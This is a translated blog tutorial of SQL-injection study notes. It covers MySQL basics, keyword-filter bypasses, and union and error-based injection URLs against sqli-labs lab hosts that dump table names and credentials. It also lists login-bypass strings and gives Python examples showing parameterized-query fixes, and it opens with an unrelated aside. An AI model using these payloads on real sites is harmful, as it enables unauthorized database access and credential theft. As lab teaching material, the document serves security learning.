Tutorial study notes (1): 09, MySQL database vulnerabilities

In fact she doesn't like you; she is just lonely. You just happened to come along, you just happened to be nice to her, you just happened to catch her eye, and she just didn't turn you away when you stepped forward. All of it was simply good timing...

I. MySQL statements

Create a database

create database test;

Select the database to work in

use test;

Create a table

create table aiyou ( id int, username varchar(20), password varchar(30));

Inserting data into the table

insert into aiyou values(1,'admin','456');

insert into aiyou values(2,'boss','123');

insert into aiyou values (3,'ttt','123'), (3,'qqq','321');
Show all records in the table aiyou

select * from aiyou;
Look up the records in aiyou that satisfy id = 1

select * from aiyou where id=1;

Look up the records in aiyou that satisfy id = 1, showing only the username and password fields

select username,password from aiyou where id=1;

Look up the records in aiyou that satisfy id = 1 and username = "admin"

select * from aiyou where id=1 and username="admin";

Look up the records in aiyou that satisfy id = 1 or username = "boss"

select * from aiyou where id=1 or username="boss";
drop database test; delete the database

drop table aiyou; delete the table

update aiyou set password='111' where username='boss'; update data

delete from aiyou where username='boss'; delete data

select load_file('c:/111.txt'); read a file from the server's disk. This needs the FILE privilege and is restricted by the secure_file_priv system variable (NULL disables it entirely, a directory value limits reads to that directory); when the file cannot be read the function returns NULL rather than an error

show databases; list the databases this account is allowed to see

show tables; list the tables in the selected database

show create table aiyou\G  show the full table definition (\G prints the result vertically and replaces the ; terminator; writing \G; sends an extra empty statement, which the client reports as "No query specified")

describe <table name>; show the table structure (desc is accepted as the short form, and the mysql client tab-completes table and column names)

The functions and variables below are the usual fingerprinting queries; the injection sections later put exactly these expressions into the displayed columns.

select database(); current database

select version(); database version

select user(); current user, as user@host supplied by the client

select now(); current date and time

select system_user(); synonym for user(): the MySQL account the client connected as, not an operating-system user

select current_user(); the account MySQL actually used to authenticate the session, which can differ from user() when a wildcard host entry matched

select session_user(); synonym for user()

select @@datadir; path of the data directory where the databases are stored

select @@basedir; MySQL installation directory

select @@version_compile_os; operating system MySQL was compiled for
II. Database connection

<?php
$dbhost = 'localhost'; // MySQL server host address
$dbuser = 'root';      // MySQL user name
$dbpass = 'root';      // MySQL password
$conn = mysqli_connect($dbhost, $dbuser, $dbpass);
if (!$conn) {
    die('Could not connect: ' . mysqli_connect_error());
}
echo 'Database connection succeeded!';
mysqli_close($conn);
?>

A connection failure has to be reported with mysqli_connect_error(); mysqli_error() needs a live connection handle as its argument and has nothing to report when the connection itself failed.

III. Bypassing anti-injection filters

Target: http://www.aiyou.com?id=1

1. Case bypass (defeats a case-sensitive filter that only matches lowercase and)

http://www.aiyou.com?id=1 And 1=1

2. Double-write bypass (defeats a filter that deletes the keyword once: removing the inner and from aandnd leaves and)

http://www.aiyou.com?id=1 aandnd 1=1

3. %00 bypass (targets a filter that does not match across, or does not look past, a null byte; whether the keyword still reaches the SQL parser intact depends on the back end and must be checked in the lab)

http://www.aiyou.com?id=1 a%00nd 1=1
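The three bypasses only make sense against a concrete filter, so here is an added example (not code from the original tutorial) that models the kind of blacklist they defeat, a version that closes these three holes, and the whitelist check that makes the question moot for a numeric id. The filter logic is an assumption; the page never shows the real one.

```python
import re

# Added example (not from the original tutorial): a toy model of the blacklist
# filter that the three bypasses above target, plus the fix that closes them.
# The filter logic is assumed; the page does not show the real one.


def naive_filter(param: str) -> str:
    """Case-sensitive, single-pass deletion of 'and',
    like PHP str_replace('and', '', $id) on the GET parameter."""
    return param.replace("and", "")


def robust_filter(param: str) -> str:
    """Drop NUL bytes, then delete 'and' case-insensitively until nothing changes.
    Closes these three tricks but is still a blacklist: 'a/**/nd', '&&' or a
    different keyword walk straight past it."""
    cleaned = param.replace("\x00", "")
    keyword = re.compile("and", re.IGNORECASE)
    while True:
        shorter = keyword.sub("", cleaned)
        if shorter == cleaned:
            return cleaned
        cleaned = shorter


def has_and(fragment: str) -> bool:
    """Is an intact AND keyword (any case) still present in the text?"""
    return re.search(r"\band\b", fragment, re.IGNORECASE) is not None


def whitelist_int(param: str) -> int:
    """The real fix for a numeric ?id=: accept only digits, so no keyword
    can reach the SQL at all."""
    if not re.fullmatch(r"[0-9]+", param):
        raise ValueError("id must be an unsigned integer")
    return int(param)


# The three payloads from the page, URL-decoded (constructed inputs).
PAYLOADS = {
    "case":   "1 And 1=1",
    "double": "1 aandnd 1=1",
    "null":   "1 a\x00nd 1=1",   # ?id=1 a%00nd 1=1 after decoding
}


def survives(filter_fn, name: str) -> bool:
    """True when an AND keyword, or the untouched payload itself, gets past
    filter_fn.  For the NUL case the filter never matches, so the text reaches
    the query unchanged; whether the parser then still reads 'a<NUL>nd' as AND
    is a property of the back end to verify in the lab."""
    original = PAYLOADS[name]
    cleaned = filter_fn(original)
    return has_and(cleaned) or cleaned == original
```

Run survives(naive_filter, name) and survives(robust_filter, name) for each payload to see which filter each trick gets past; whitelist_int rejects all three outright, which is why a type check beats keyword blacklisting for numeric parameters.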

IV. Manual injection

Less-2 concatenates the id as a number, without quotes, so the payloads need no closing quote or comment.

1. http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=1 returns the normal page

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 returns an error or an empty result, indicating that injection is present

2. Determine the number of columns

http://192.168.21.140/sqli/Less-2/index.php?id=1 order by 3 returns normally, order by 4 returns an error, so the query selects three columns

3. Union query

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,2,3 — the numbers that show up on the page (2 and 3 here) mark the columns we can replace with whatever we want to read

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,version(),database() gets the database version and the current database

4. Get table names

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' gets the table names in the security database

5. Get column names

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' gets the column names of the users table (add and table_schema='security' when other databases on the server also have a table called users)

6. Get field contents

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from users
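The six steps above are a fixed procedure, so here they are automated end to end as an added example (not code from the original tutorial or from sqli-labs). The Less-2 page is modelled as SELECT * FROM users WHERE id=$id LIMIT 0,1 with $id concatenated unescaped, over an in-memory SQLite database with constructed rows. SQLite has no information_schema or version(), so sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns; the rest is the same SQL as in the URLs.

```python
import sqlite3

# Added example (not from the original tutorial or sqli-labs): the manual
# union-injection steps run against a constructed stand-in for the Less-2 page.
# SQLite is used so it runs offline; sqlite_master / pragma_table_info() replace
# MySQL's information_schema.tables / .columns.


def make_db():
    """Constructed sample data standing in for the sqli-labs 'security' database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
        CREATE TABLE emails (id INTEGER, email_id TEXT);
    """)
    return conn


def vulnerable_page(conn, id_param):
    """What a Less-2-style page does: one row back, None when nothing matches,
    or the database error text when the SQL breaks (the 'error is returned' signal)."""
    sql = "SELECT * FROM users WHERE id=" + id_param + " LIMIT 0,1"
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "error: " + str(exc)


def is_injectable(conn):
    """Step 1: 'and 1=1' keeps the normal row, 'and 1=2' makes it disappear."""
    normal = vulnerable_page(conn, "1")
    return (vulnerable_page(conn, "1 and 1=1") == normal
            and vulnerable_page(conn, "1 and 1=2") is None)


def count_columns(conn, limit=20):
    """Step 2: ORDER BY n succeeds while n <= column count and errors after it."""
    for n in range(1, limit + 1):
        if isinstance(vulnerable_page(conn, f"1 order by {n}"), str):
            return n - 1
    return limit


def union_extract(conn, col2, col3, from_clause=""):
    """Steps 3-6: suppress the real row with 'and 1=2' and put what we want to
    read into the displayed columns (2 and 3) of a UNION SELECT."""
    return vulnerable_page(conn, f"1 and 1=2 union select 1,{col2},{col3}{from_clause}")


def dump(conn):
    """Whole procedure: column count, table names, users columns, credentials."""
    ncols = count_columns(conn)
    tables = union_extract(conn, "group_concat(name)", "3",
                           " from sqlite_master where type='table'")
    columns = union_extract(conn, "group_concat(name)", "3",
                            " from pragma_table_info('users')")
    creds = union_extract(conn, "group_concat(username)", "group_concat(password)",
                          " from users")
    return {
        "columns_in_query": ncols,
        "tables": tables[1],
        "users_columns": columns[1],
        "credentials": (creds[1], creds[2]),
    }
```

dump(make_db()) walks the same path as the URLs: three columns, then users,emails from the catalogue, then id,username,password, then every username and password in one row. The string concatenation in vulnerable_page is the whole vulnerability; binding the id as a parameter (conn.execute("... WHERE id=? LIMIT 0,1", (id_param,))) makes every step above fail.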
V. Error-based injection

Less-1 wraps the id in quotes, so every payload here starts with 1' to close the string and ends with --+ (a -- comment followed by a space, sent as +) to discard the rest of the original query. All of them rely on the same trick: a GROUP BY over a key that contains floor(rand(0)*2) makes MySQL hit a duplicate key in its temporary table, and the error message echoes the key, which carries whatever data was concatenated in front of it. It needs at least three rows in the scanned table (information_schema.tables always has plenty) and a page that displays the database error.

1. Get the database user

http://192.168.21.137/sqli/Less-1/index.php?id=1' union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b --+

The union form has to match the column count of the original query (three for Less-1), otherwise MySQL rejects the statement before the subquery ever runs; the and (select 1 from (...)a) form used from the second payload on has no such constraint.

2. Get the database name

http://192.168.21.137/sqli/Less-1/index.php?id=1' union select 1 from (select count(*),concat(floor(rand(0)*2),(select database() limit 0,1))a from information_schema.tables group by a)b --+

http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

LIMIT 2,1 returns the third schema; change the offset to walk through the list. 0x7e is ~, used as a delimiter so the value stands out in the error text.

3. Get the current database name; it comes back as hex and has to be decoded

http://192.168.21.137/sqli/Less-1/index.php?id=1' and (select 1 from(select count(*),concat((select(select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

4. Get table names

http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

5. Get column names

http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select(select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

table_schema=0x7365637572697479 is 'security' and table_name=0x7573657273 is 'users' written as hex literals, which avoids quote characters; LIMIT 2,1 returns the third column.

6. Get field contents

http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x7e,password,0x27,0x7e) FROM users LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

LIMIT 2,1 returns the third row of users; step through the offsets to dump the table.
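Why floor(rand(0)*2) with GROUP BY fails so dependably is worth seeing in code, so here is an added example (not from the original tutorial) that re-implements MySQL's RAND(seed) in Python, using the seeding from Item_func_rand (seed1 = N*0x10001 + 55555555, seed2 = N*0x10000001) and the my_rnd() linear recurrence with modulus 0x3FFFFFFF, and then models how GROUP BY fills its temporary table. The temporary-table model is a simplification of MySQL's behaviour, not its source.

```python
# Added example (not from the original tutorial): MySQL's RAND(seed) generator
# re-implemented from the my_rnd() recurrence, plus a model of GROUP BY's
# temporary table, to show why
#   select count(*), concat('~security~', floor(rand(0)*2)) a
#   from information_schema.tables group by a
# fails with "Duplicate entry '~security~1' for key 'group_key'".

MAX_VALUE = 0x3FFFFFFF  # modulus used by my_rnd()


def mysql_rand(seed):
    """Generator yielding the same floats MySQL's RAND(seed) returns."""
    seed1 = (seed * 0x10001 + 55555555) & 0xFFFFFFFF
    seed2 = (seed * 0x10000001) & 0xFFFFFFFF
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand0_x2(n):
    """floor(rand(0)*2) for the first n scanned rows: 0 1 1 0 1 1 ..."""
    gen = mysql_rand(0)
    return [int(next(gen) * 2) for _ in range(n)]


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062."""


def group_by_temp_table(rows, prefix="~security~"):
    """Simplified model of GROUP BY over a computed key.  MySQL evaluates the
    key once to look the group up and, when the group is absent, evaluates it
    AGAIN to build the row it inserts.  rand(0) advances on every evaluation,
    so a key that was absent on lookup can already exist on insert: that is
    the duplicate.  Returns the finished groups when no collision happens."""
    gen = mysql_rand(0)
    groups = {}
    for _ in range(rows):
        key = prefix + str(int(next(gen) * 2))     # evaluation 1: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = prefix + str(int(next(gen) * 2))     # evaluation 2: insert
        if key in groups:
            raise DuplicateEntry(f"Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups
```

Trace it by hand with the sequence 0 1 1 0 1 1: row one looks up ~security~0, misses, and inserts ~security~1; row two looks up ~security~1 and hits; row three looks up ~security~0, misses, re-evaluates to ~security~1 and collides. That is why the trick needs at least three rows and why the prefix, which is the data you want leaked, ends up inside the error message.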
VI. Back-end login bypass

These strings go into the username field of a login form whose query is built as where username='<input>' and password='<input>'. The leading quote closes the string literal; # starts a MySQL comment, so everything after it, including the password check, is thrown away; the or forms make the WHERE clause true without needing a comment.

1. admin'#

2. admin' or 1=1 #

3. 'or'='or'

4. admin' or '1'='1

5. admin' #
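An added example (not code from the original tutorial) of the login check these strings assume, next to the parameterized version that defeats all of them. SQLite is the offline stand-in; it has no # comment, so the two MySQL-only forms admin'# and admin' # are written with SQLite's -- here and behave the same way (the quote closes the literal, the comment swallows the password check). The 'or'='or' form is not modelled; the other four are.

```python
import sqlite3

# Added example (not from the original tutorial): a constructed login check built
# by string concatenation, which the bypass strings above assume, beside the
# parameterized version.  SQLite stands in for MySQL; '#' comments become '-- '.


def make_db():
    """Constructed single-user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn


def login_vulnerable(conn, username, password):
    """where username='<input>' and password='<input>', concatenated raw.
    Returns the logged-in user name or None."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Username/password pairs for the bypass strings (MySQL '#' written as '-- ').
BYPASSES = {
    "admin'#":          ("admin'-- ",         "wrong"),
    "admin' or 1=1 #":  ("admin' or 1=1 -- ", "wrong"),
    "admin' or '1'='1": ("admin' or '1'='1",  "wrong"),
    "admin' #":         ("admin' -- ",        "wrong"),
}


def try_all(conn, login_fn):
    """Which bypass strings log in, and as whom, for a given login implementation."""
    return {name: login_fn(conn, user, pw) for name, (user, pw) in BYPASSES.items()}
```

try_all(conn, login_vulnerable) returns 'admin' for every entry with a wrong password; try_all(conn, login_safe) returns None for all of them while the real credentials still work, because a bound parameter can never close the quote that the query text opened.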

VII. Getting the website's root directory

1. Error messages that display it (a PHP warning with the full script path, for example)

2. Search engine: site:<target site> warning

3. A leftover phpinfo file (its DOCUMENT_ROOT and SCRIPT_FILENAME entries give the path)

4. A vulnerability that discloses the path

5. Reading a configuration file (for example with load_file() once a path is known)

Illegal use is prohibited; you act at your own risk.

Welcome to follow the official account: web security tool library




Source: blog.csdn.net/weixin_41489908/article/details/104417966